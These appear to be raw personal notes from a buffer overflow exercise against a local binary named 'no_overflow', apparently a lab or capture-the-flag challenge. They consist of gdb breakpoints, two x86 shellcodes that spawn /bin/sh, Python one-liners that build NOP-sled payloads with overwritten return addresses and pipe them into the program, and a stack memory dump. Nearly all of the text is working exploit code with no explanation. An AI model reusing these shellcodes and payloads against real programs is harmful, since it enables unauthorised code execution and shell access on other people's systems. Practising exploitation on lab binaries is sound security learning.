break *0x0804855a
break *0x0804855f
break *0x08048576

ulimit -c unlimited

REMOVE CORE

shellcode (23): \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80



set *0xffffd590 = 0x6a0b589952682f2f7368682f62696e89e3525389e1cd80

cat <(echo -1) <(python -c 'print "\x90"*237 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x90"*4 + "\xf0\xd5\xff\xff"*2') - | ./no_overflow

python -c 'print "\x90"*237 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x90"*4 + "\x90\xd5\xff\xff"*2'
python -c 'print "a"*23 + "b" + "cdef"*62'


shellcode2 (55): \x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42

python -c 'print "a"*55 + "b" + "cdef"*54'


cat <(echo -1) <(python -c 'print "\x90"*205 + "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42" +"\xf0\xd5\xff\xff"*20') - | ./no_overflow




cat <(echo -1) <(python -c 'print "a"*300') - | ./no_overflow



0xffffd580:	0x00000000	0xffffd590	0xffffffff	0xf7ffd938
0xffffd590:	0x61616161	0x0000000a	0xf63d4e2e	0x00000000
0xffffd5a0:	0x00000000	0x00000400	0xf7fc7ac0	0x00000000
0xffffd5b0:	0xffffd664	0xffffd5d8	0xffffd5d0	0x08048286
0xffffd5c0:	0xf7ffd938	0x00000000	0x00000017	0x00000000
0xffffd5d0:	0xffffffff	0xf7fc7b54	0xf7e20908	0xf7fda858
0xffffd5e0:	0xf7fc7ac0	0xf7fd8000	0x00000017	0xf7e8c395
0xffffd5f0:	0x00000017	0x0000000a	0xf7fc8898	0xf7e8b3de
0xffffd600:	0x00000017	0xf7fc7ac0	0x080486c5	0xf7e8c49e
0xffffd610:	0xf7fc7ac0	0xf7ffd000	0xf7ffd938	0x00000001
0xffffd620:	0xffffd680	0xf7fea181	0xf7ffdaf0	0xf7fdab58
0xffffd630:	0x00000001	0x00000001	0x00000000	0xf7fc7000
0xffffd640:	0xf7fc7ac0	0xf7fc7ac0	0xffffd664	0x0804a024
0xffffd650:	0x0804826c	0x0804823c	0xf7e68311	0xf7fc7000
0xffffd660:	0xf7fc7c20	0xf7fc7d84	0xf7e1a940	0xf7e713d6
0xffffd670:	0xf7fc7c20	0x080486c6	0xffffd6a4	0x00000000
0xffffd680:	0xffffd6c8	0xf7ff0500	0xf7e71359	0xf7fc7000
0xffffd690:	0x00000000	0x00000000	0xffffd6c8	0x080485e5
0xffffd6a0:	0xffffffff	0xffffd6bc	0xffffd76c	0xf7e4e39d
0xffffd6b0:	0xf7fc73c4	0xf7ffd000	0x0804860b	0xffffffff
0xffffd6c0:	0x08048600	0x00000000	0x00000000	0xf7e34a83
0xffffd6d0:	0x00000001	0xffffd764	0xffffd76c	0xf7feacea
0xffffd6e0:	0x00000001	0xffffd764	0xffffd704	0x0804a020
0xffffd6f0:	0x0804826c	0xf7fc7000	0x00000000	0x00000000
0xffffd700:	0x00000000	0x3dc17e81	0x04f85a91	0x00000000
0xffffd710:	0x00000000	0x00000000	0x00000001	0x08048430
0xffffd720:	0x00000000	0xf7ff0500	0xf7e34999	0xf7ffd000
0xffffd730:	0x00000001	0x08048430	0x00000000	0x08048451
0xffffd740:	0x080485a0	0x00000001	0xffffd764	0x08048600
0xffffd750:	0x08048670	0xf7feb180	0xffffd75c	0x0000001c
0xffffd760:	0x00000001	0xffffd882	0x00000000	0xffffd8a8
0xffffd770:	0xffffd8bd	0xffffd8cd	0xffffd8d8	0xffffd8fa